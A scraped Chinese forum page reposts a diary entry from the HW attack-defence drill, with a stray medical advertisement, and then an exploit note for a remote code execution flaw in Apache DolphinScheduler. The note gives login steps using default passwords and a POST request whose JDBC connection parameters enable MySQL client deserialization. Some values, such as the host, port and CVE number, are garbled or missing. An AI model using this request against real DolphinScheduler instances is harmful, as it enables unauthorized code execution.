php发展

首页 » 常识 » 常识 » HW平安夜红队手册之代理转发
TUhjnbcbe - 2021/5/18 18:08:00
白癜风山东哪家医院好 http://baidianfeng.39.net/a_yufang/131228/4318885.html

HW日报

HW第七天,时间过半。往日的平静最终被打破~

今天的机房依旧很冷,厚厚的外套已经无法抵挡敌*带来的寒意。攻击队伍已经开始往这边探测过来了,几天的平静最终还是被打破。他们来了~~~

要提醒自己时刻保持警惕,打起12分的精神紧盯监控、一手拿着剪刀随时准备一刀切

今年的HW尤其特别,特别到让人摸不着头脑。

·防守方安安静静、无报警、无应急、无溯源。互相打探、互相讨论:‘攻击队伍在干嘛?来了吗?怎么还没来?’

·攻击方小心翼翼,不用扫描器、不用脚本、重装电脑、清浏览器缓存、访问下网站判断是蜜罐立马就撤离,仿佛人间蒸发一般的招数。

往年防守方不扣分就是赢,今年防守方不抓到人就‘如同’输。

总之今年,一切都是静悄悄的~

今天很安静,但是请别大意

今天,你拔线了么?

“满当当的昨天,富意义的今天~”

今日主题:01今日收录、02情报收集、03代理转发与隧道

01今日收录

年9月17日星期二阴

深夜难眠,回想起今天waf上一大堆误报和寥寥无几的告警,甲方爸爸提供的两荤一素已经换成了白粥榨菜,农夫已经换成了冰露,或许我们是时长一个月实习生的身份,已经彻底暴露了,明天不知道是不是只能吃开水泡面了。唉,明天又要穿上白衬衫,继续假装自己是5年工作经验的安全专家,今晚终于认清现实,活捉红队0day依然是我们遥不可及的梦。

生而为人,梦里值守。

转载自:渗了个透

1、ApacheDolphinScheduler远程代码执行[CVE--]它是一个分布式去中心化,易扩展的可视化DAG(有向无环图)工作流任务调度系统。利用漏洞:需要登录权限,[09/12态势感知]提供一组默认密码。该漏洞存在于数据源中心未限制添加的jdbc连接参数,从而实现JDBC客户端反序列化。1、登录到面板-数据源中心。

2、jdbc连接参数就是主角,这里没有限制任意类型的连接串参数。

3、将以下数据添加到jdbc连接参数中,就可以直接触发。

POST/dolphinscheduler/datasources/connectHTTP/1.1

type=MYSQLname=testnote=host=.0.0.1port=database=test

principal=userName=rootpassword=rootconnectType=

other={"detectCustomCollations":true,"autoDeserialize":true}

关于MySQLJDBC客户端反序列化漏洞的相关参考:

1
查看完整版本: HW平安夜红队手册之代理转发